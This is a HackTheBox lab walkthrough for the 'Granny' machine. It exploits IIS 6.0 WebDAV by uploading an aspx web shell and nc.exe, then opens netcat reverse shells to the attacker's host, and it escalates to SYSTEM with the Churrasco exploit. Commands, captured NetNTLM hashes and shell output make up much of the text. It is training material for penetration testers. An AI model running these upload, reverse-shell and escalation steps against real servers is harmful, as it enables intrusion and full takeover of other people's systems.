Granny (WebDav upload + windows server 2003 kernel exploit)

Granny was done with all native Kali tools besides the windows-exploit-suggester.

This is a write-up for the Granny machine on the HackTheBox platform. HackTheBox is a website where users can test their pen testing skills by legally hacking into a wide variety of machines using different techniques.

This walkthrough was aimed at OSCP/PWK students preparing for the PWK course. No use of Metasploit or Meterpreter was used in this walkthrough making it very OSCP friendly. I hope you enjoy reading.

Initial Recon:

We begin with a nmap scan:

nmap -sC -sV 10.10.10.15
Starting Nmap 7.80 (  ) at 2020-02-18 22:17 AEDT
Nmap scan report for 10.10.10.15
Host is up (0.31s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Tue, 18 Feb 2020 11:19:48 GMT
|   WebDAV type: Unknown
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at  .
Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds

We notice only one port open (Port 80) which is an IIS 6 server. We also notice that the web server allows HTTP methods such as:

TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT

These methods can be risky when used publicly. Only server Admins should have the ability to use the above methods.

Enumeration:

To confirm if we could PUT files to the server, we used a simple tool called davtest. (PUT is a HTTP method that allows a form of file upload to the server)

davtest -url 
********************************************************
 Testing DAV connection
OPEN  SUCCEED:  
********************************************************
NOTE Random string for this session: 2RzQwLnrs
********************************************************
 Creating directory
MKCOL  SUCCEED:  Created 
********************************************************
 Sending test files
PUT cgi FAIL
PUT pl SUCCEED: 
PUT cfm SUCCEED: 
PUT aspx FAIL
PUT html SUCCEED: 
PUT shtml FAIL
PUT jsp SUCCEED: 
PUT php SUCCEED: 
PUT txt SUCCEED: 
PUT jhtml SUCCEED: 
PUT asp FAIL
********************************************************
 Checking for test file execution
EXEC pl FAIL
EXEC cfm FAIL
EXEC html SUCCEED: 
EXEC jsp FAIL
EXEC php FAIL
EXEC txt SUCCEED: 
EXEC jhtml FAIL********************************************************
/usr/bin/davtest Summary:
Created: 
PUT File: 
PUT File: 
PUT File: 
PUT File: 
PUT File: 
PUT File: 
PUT File: 
Executes: 
Executes:

Navigating to: http://10.10.10.15/DavTestDir_2RzQwLnrs/davtest_2RzQwLnrs.html

Confirms that we can PUT html files on the server:

By Googling “IIS 6 exploit”, multiple articles show how vulnerable IIS 6.0 can be. An interesting article which was discovered, proves we can obtain RCE:

IIS 6.0 Vulnerability Leads to Code Execution — TrendLabs Security Intelligence BlogMicrosoft Internet Information Services (IIS) 6.0 is vulnerable to a zero-day Buffer Overflow vulnerability (…blog.trendmicro.com

As seen in the above davtest, we can only upload html & txt files.

Initial Foothold:

To obtain valid RCE a simple way, we can curl a web shell to the server as a text file. After the text file is uploaded, we can then rename it to a aspx file.

To begin, we copy two files.

The first (nc.exe) is a netcat binary which can allow us to obtain a reverse TCP connection to the server.

The second (cmdasp.aspx) is a web shell coded in aspx that will allow us to execute remote operating system commands on the server.

cp /usr/share/windows-resources/binaries/nc.exe .
cp /usr/share/webshells/aspx/cmdasp.aspx .

After the above is copied to your working directory on Linux, the two files should be renamed with a txt extension as it allowed to be uploaded to the server:

cp aspx_cmd.aspx shell.txt
cp nc.exe nc.txt

We now curl the files to the server, which is a way of copying local files to a remote location, the server in this example:

curl  --upload-file shell.txt

We can confirm the file was uploaded by navigating to: http://10.10.10.15/shell.txt

This serves no purpose to us as we cannot use shell.txt in anyway nor execute commands.

curl is used once again to move the file from txt to aspx:

curl -X MOVE --header "Destination:"

It is worth noting that the server does not allow aspx to be uploaded, although, uploading a txt file and renaming or moving it to aspx is allowed.

If we navigate to: http://10.10.10.15/shell.aspx we notice our web shell appears:

If we type a command, for example: whoami we notice we successfully have remote code execution on Granny as nt authority\network service

This is great, but, we should always aim for a proper command shell when exploiting a server. (If possible)

To do this, we can upload the nc.exe binary like we did for the aspx web shell as described before.

curl  --upload-file nc.txt

We now move the file from txt to exe:

curl -X MOVE --header "Destination:"

We can prove that it is on the server by checking the C:\inetpub\wwwroot directory. (The default directory where files are uploaded)

nc.exe has successfully been uploaded. We can now attempt to gain a reverse shell.

Before we gain a reverse shell, we should setup a netcat listener which can be used to catch the reverse shell, this can be done by running the following command on Linux:

nc -lvnp 1337
Ncat: Version 7.80 (  )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337

We can gain a reverse shell by executing the following command in the web shell:

cmd.exe /c "c:\Inetpub\wwwroot\nc.exe 10.10.14.10 1337 -e cmd.exe"

If all is right, we should have a shell on our nc listener:

Ncat: Version 7.80 (  )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.15.
Ncat: Connection from 10.10.10.15:1030.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.c:\windows\system32\inetsrv>whoami
whoami
nt authority\network servicec:\windows\system32\inetsrv>hostname
hostname
granny

By running whoami & hostname, we can prove that we successfully gained a low privilege shell on Granny!

***If you cannot get a stable shell please switch your HTB VPN from US to EU or vice versa. I had this exact issue***

Alternative method / Bonus round:

We can use a tool called cadaver instead of curl to upload and move files. The below command can be used to connect to the URL found when using the davtest tool at the start of this walkthrough.

cadaver 
dav:/DavTestDir_2RzQwLnrs/>

After connecting to the URL, we upload a html version of our aspx web shell:

dav:/DavTestDir_2RzQwLnrs/> put aspx_cmd.aspx aspx.html
Uploading aspx_cmd.aspx to `/DavTestDir_2RzQwLnrs/aspx.html':
Progress: [=============================>] 100.0% of 1398 bytes succeeded.

We can view our uploaded file:

The below command moves the web shell from html to aspx:

dav:/DavTestDir_2RzQwLnrs/> move aspx.html cmd.aspx
Moving `/DavTestDir_2RzQwLnrs/aspx.html' to `/DavTestDir_2RzQwLnrs/cmd.aspx':  succeeded.

We can now obtain a proper web shell and execute commands:

The dir command shows the contents of the directory we are currently in:

smbserver is a simple tool that creates a smb share on the local system and hosts all files found within the directory from where it is executed from:

smbserver.py share .
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

We can use the Windows copy command to copy the nc.exe binary from our local machine to the server:

copy \\10.10.14.14\share\nc.exe c:\windows\temp\nc.exe

We notice the GRANNY user authenticates to our smb share and we can assume the file is copied:

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.15,1034)
[*] AUTHENTICATE_MESSAGE (HTB\GRANNY$,GRANNY)
[*] User GRANNY\GRANNY$ authenticated successfully
[*] GRANNY$::HTB:1bb7516ed44f9a9000000000000000000000000000000000:dd9a6428f2d4d46334db5cbc59f8735116ee19815877ba88:4141414141414141
[-] Unknown level for query path info! 0x109
[*] Closing down connection (10.10.10.15,1034)
[*] Remaining connections []

If we rerun the dir command, we notice nc.exe appears:

We can obtain a reverse shell another way, this method executes nc.exe straight from the smb share (local machine) rather than using nc.exe that was uploaded to the server previously:

\\10.10.14.14\share\nc.exe 10.10.14.14 1337 -e cmd.exe

If we setup a netcat listener, we should get a reverse shell onto the server:

nc -lvnp 1337
Ncat: Version 7.80 (  )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.15.
Ncat: Connection from 10.10.10.15:1053.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.c:\windows\system32\inetsrv>whoami
whoami
nt authority\network servicec:\windows\system32\inetsrv>hostname
hostname
granny

Privilege Escalation:

For easy boxes like Granny, the privilege escalation is usually something vulnerable with the OS version or patches found on the server. I usually use an exploit suggester tool such as:

AonCyberLabs/Windows-Exploit-SuggesterThis tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential…github.com

To use this tool, we need to generate a text file with the output of the systeminfo command. (systeminfo is a Windows command used to give all information of the server the command is being executed on)

I begin with changing directories to Temp as it allows us write permissions:

c:\windows\system32\inetsrv>cd C:\Windows\Temp
cd C:\Windows\Temp

Next I run:

C:\WINDOWS\Temp>systeminfo > system.txt
systeminfo > system.txt

This runs the systeminfo command and transfers the output to a text file.

We can double check the file was created by running dir which lists all files and folders found in the current directory:

C:\WINDOWS\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FEDirectory of C:\WINDOWS\Temp02/18/2020 02:47 PM <DIR> .
02/18/2020 02:47 PM <DIR> ..
04/12/2017 09:14 PM <DIR> rad61C21.tmp
04/12/2017 09:14 PM <DIR> radDDF39.tmp
02/18/2020 02:47 PM 1,621 system.txt
02/18/2007 02:00 PM 22,752 UPD55.tmp
12/24/2017 07:24 PM <DIR> vmware-SYSTEM
02/18/2020 01:11 PM 10,643 vmware-vmsvc.log
12/24/2017 07:30 PM 2,294 vmware-vmusr.log
02/18/2020 01:11 PM 273 vmware-vmvss.log
 5 File(s) 37,583 bytes
 5 Dir(s) 18,125,664,256 bytes free

We will now need to transfer system.txt back to Linux. This can be done by running the following command on Linux:

smbserver.py share `pwd`
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

This creates another smb share which allows transferring from the compromised server (Granny) to Linux.

We now run the following command on Granny:

C:\WINDOWS\Temp>net use z: \\10.10.14.14\share
net use z: \\10.10.14.14\share
The command completed successfully.

Once the share is established, we now need to copy system.txt to z: (10.10.14.14 — Our Linux machine)

C:\WINDOWS\Temp>copy system.txt z:
copy system.txt z:
        1 file(s) copied.

You should notice a hit on the smbserver we setup before:

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.15,1064)
[*] AUTHENTICATE_MESSAGE (HTB\GRANNY$,GRANNY)
[*] User GRANNY\GRANNY$ authenticated successfully
[*] GRANNY$::HTB:fc88ac095cadfc3000000000000000000000000000000000:63704b4121b07c1517e976dffc3589ad5815c749fdf69cd6:4141414141414141

If we perform a ls -la on our Linux working directory, we should see system.txt: (ls -la shows permissions, ownership, size and modification date of all files in the currently working directory)

ls -la system.txt 
-rwxr-xr-x 1 501 dialout 1621 Jan  1  1970 system.txt

We now need to copy the contents of windows-exploit-suggester.py to our Linux machine.

https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py

To use this tool, we firstly need to make it executable by running:

chmod +x windows-exploit-suggester.py

Afterwards, we need to update it:

./windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2020-02-18-mssb.xls
[*] done

It should be noted that after the tool is updated, a database file can be found in the current working directory called: 2020–02–18-mssb.xls.

Reading the Github repo for windows-exploit-suggester states the below command should generate an output file. This output file will tell us which privilege escalation exploits should work on Granny:

./windows-exploit-suggester.py --database 2020-02-18-mssb.xls --systeminfo system.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library

You may run into an issue which requires python-xlrd to be upgraded. This can be done by running the following command:

pip install xlrd
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at 
Collecting xlrd
  Downloading xlrd-1.2.0-py2.py3-none-any.whl (103 kB)
     |████████████████████████████████| 103 kB 4.8 MB/s 
Installing collected packages: xlrd
Successfully installed xlrd-1.2.0
WARNING: You are using pip version 20.0.1; however, version 20.0.2 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.

Rerunning the windows-exploit-suggester command now should work:

./windows-exploit-suggester.py --database 2020-02-18-mssb.xls --systeminfo system.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   , Win32k Elevation of Privilege Vulnerability, PoC
[*]    -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]    -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]    -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]    -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]    -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]    -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]    -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]    -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]    -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]    -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]    -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]    -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]    -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]    -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]    -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]    -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]    -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   , -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]    -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]    -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done

After trying a handful of exploits related to the information given above, I decided to go the manual way and Google for OS related exploits:

Clicking on the second link, we discovered that there was a precompiled exploit:

We can find Churrasco on Kali by using the locate command which is self explanatory:

locate churrasco
/usr/share/sqlninja/apps/churrasco.exe

This should be copied into the current working directory.

On Granny, we changed directories back to wwwroot as that is the location of our uploaded nc.exe file:

C:\WINDOWS\Temp>cd C:\inetpub\wwwroot
cd C:\inetpub\wwwroot

On Linux we created another smbserver:

smbserver.py share .
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

We can gain knowledge on how to run Churrasco by running the executable:

C:\Inetpub\wwwroot>\\10.10.14.14\share\churrasco.exe
\\10.10.14.14\share\churrasco.exe
/churrasco/-->Usage: Churrasco.exe [-d] "command to run"
C:\WINDOWS\TEMP

Our nc.exe skills learnt previously, should help us run Churrasco in a way that would allow us to spawn a reverse shell with SYSTEM privileges:

C:\Inetpub\wwwroot>\\10.10.14.14\share\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.14 5555 -e cmd.exe"
\\10.10.14.14\share\churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.14 5555 -e cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x714
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x70c
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

If we also had a nc listener setup, we should obtain a SYSTEM Shell:

nc -nlvp 5555
Ncat: Version 7.80 (  )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.15.
Ncat: Connection from 10.10.10.15:1072.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.C:\WINDOWS\TEMP>whoami
whoami
nt authority\system

PreviousNetworked NextConceal (snmpwalk + ike service)

Last updated 2 years ago